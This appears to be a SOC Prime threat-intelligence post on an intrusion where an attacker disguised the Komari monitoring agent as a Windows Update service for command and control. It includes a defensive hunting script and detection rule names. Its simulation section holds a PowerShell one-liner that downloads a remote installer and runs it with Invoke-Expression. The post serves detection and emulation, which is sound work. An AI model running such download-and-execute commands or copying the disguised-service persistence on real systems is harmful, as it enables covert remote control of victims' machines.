SOC Prime Bias: Critical

30 Apr 2026 14:19 UTC

Komari: The “Monitoring” Tool That Didn’t Need Weaponising


Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A threat actor used stolen VPN credentials to access a Huntress partner’s Windows workstation, then enabled RDP and deployed the open-source Komari monitoring agent as a SYSTEM-level service disguised as Windows Update Service through NSSM. Once installed, the agent established a persistent WebSocket connection to attacker-controlled infrastructure and provided capabilities such as command execution, terminal access, and heartbeat-style pinging. In practice, the tool functioned as a lightweight command-and-control framework without requiring additional weaponization.

Investigation

The intrusion began with an SSL VPN login originating from 45.153.34.132, followed by the use of Impacket’s smbexec.py to enable RDP and run a series of remote commands. Investigators found that a PowerShell one-liner downloaded the Komari installer directly from GitHub and registered it as a Windows service. That service then launched komari-agent.exe, opened a WebSocket session to the attacker’s server, and enabled arbitrary remote command execution on the host.

Mitigation

Huntress responded by isolating the compromised workstation, disabling the affected user account, and stopping the NSSM-created Komari service. The malicious WebSocket connection was blocked, and the persistence mechanism was removed from the system. Recommended follow-up defenses include tightening VPN access controls, monitoring for suspicious service creation events, inspecting outbound WebSocket activity, and strengthening RDP security.

Response

Defenders should detect creation of a Windows service named Windows Update Service that points to komari-agent.exe, monitor for long-lived outbound WebSocket connections to unfamiliar hosts, and alert on the use of Impacket tools such as smbexec.py for lateral movement. If identified, the affected endpoint should be contained immediately, compromised credentials revoked, and the rogue service removed from the environment.
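The service check described above, as an added hunting script that is not part of the report: it flags a service whose name mimics "Windows Update Service" but is not the real wuauserv, or whose image path references the binaries named in the report (komari-agent, nssm). It looks at the live service table first and then at System log 7045 (new service installed) events, so a service that was already removed still surfaces; the lookback window and the helper names are assumptions.

```powershell
# Added example, not code from the report or from the Komari project.
function Find-KomariService {
    param(
        [string[]]$SuspectBinaries = @('komari-agent', 'nssm'),  # names taken from the report
        [int]$LookbackDays = 30                                  # assumed window
    )
    $hits = New-Object System.Collections.Generic.List[object]

    function Test-Entry($name, $display, $path, $account, $source, $when) {
        # Real Windows Update is wuauserv with display name "Windows Update";
        # anything calling itself "Windows Update Service" under another name is a decoy.
        $mimic = ($display -eq 'Windows Update Service' -or $name -eq 'Windows Update Service') -and $name -ne 'wuauserv'
        $bad   = @($SuspectBinaries | Where-Object { $path -match [regex]::Escape($_) })
        if (-not $mimic -and $bad.Count -eq 0) { return }
        if ($bad.Count -gt 0) { $reason = "image path references $($bad -join ', ')" }
        else                  { $reason = 'decoy Windows Update name' }
        $hits.Add([pscustomobject]@{
            Source = $source; When = $when; Name = $name; DisplayName = $display
            ImagePath = $path; RunAs = $account; Reason = $reason
        })
    }

    # 1. Live service control manager table (catches a service that still exists).
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        Test-Entry $_.Name $_.DisplayName ([string]$_.PathName) $_.StartName 'Win32_Service' $null
    }

    # 2. Event ID 7045 in the System log (catches a service that was installed and later removed).
    $filter = @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-$LookbackDays) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = @{}
        foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        # 7045 records the display name as ServiceName, so it is passed for both fields.
        Test-Entry $d.ServiceName $d.ServiceName $d.ImagePath $d.AccountName 'EventID 7045' $_.TimeCreated
    }
    return $hits
}

Find-KomariService | Format-Table -AutoSize
```

Run it elevated so the System log and the full service table are readable; an empty result means neither the decoy name nor the report's binaries were seen in the window.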

Attack Flow

Detections

  • Possible Impacket Command Line Patterns (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Possible Remote Code Execution using Impacket (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Download or Upload via Powershell (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Possible Remote Desktop Services Shadowing (via process_creation), by SOC Prime Team, 30 Apr 2026
  • Suspicious Firewall Modifications via CLI (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Suspicious Process Utilizes a URL in the Command Line (via cmdline), by SOC Prime Team, 30 Apr 2026
  • Alternative Remote Access / Management Software (via process_creation), by SOC Prime Team, 30 Apr 2026
  • IOCs (HashSha256) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising, by SOC Prime AI Rules, 30 Apr 2026
  • IOCs (SourceIP) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising, by SOC Prime AI Rules, 30 Apr 2026
  • IOCs (DestinationIP) to detect: Komari: The “Monitoring” Tool That Didn’t Need Weaponising, by SOC Prime AI Rules, 30 Apr 2026
  • Detection of Impacket smbexec.py and cmd.exe Execution via RDP [Windows Process Creation], by SOC Prime AI Rules, 30 Apr 2026
  • PowerShell Execution for Komari Agent Installation [Windows Powershell], by SOC Prime AI Rules, 30 Apr 2026
  • Detect Komari Agent Persistence via Windows Update Service [Windows System], by SOC Prime AI Rules, 30 Apr 2026
  • Detection of Unauthorized SSLVPN Access and Post-Compromise Activity [Firewall], by SOC Prime AI Rules, 30 Apr 2026

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:
    An adversary has obtained a foothold on a Windows host and wants to install the Komari C2 agent to maintain persistence and later dump credentials (T1003.001). To avoid triggering traditional script‑blocking defenses, the attacker runs PowerShell with -ExecutionPolicy Bypass and directly downloads the installer from the public GitHub repository. The command line matches the detection rule exactly, generating the expected telemetry.

  • Regression Test Script:

    # Komari Agent Installation Simulation: fetch the public installer and run it in-memory
    $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1"
    $script = (New-Object System.Net.WebClient).DownloadString($url)
    Invoke-Expression $script

  • Cleanup Commands:

    # Remove any files created by the simulated installer (if any)
    # Path is "$Env:ProgramFiles\Komari"; without the backslash PowerShell reads
    # ProgramFilesKomari as a single, non-existent environment variable.
    Remove-Item -Path "$Env:ProgramFiles\Komari" -Recurse -Force -ErrorAction SilentlyContinue
    # Stop any Komari process that may have been started (the agent binary is komari-agent.exe)
    Get-Process -Name "komari*" -ErrorAction SilentlyContinue | Stop-Process -Force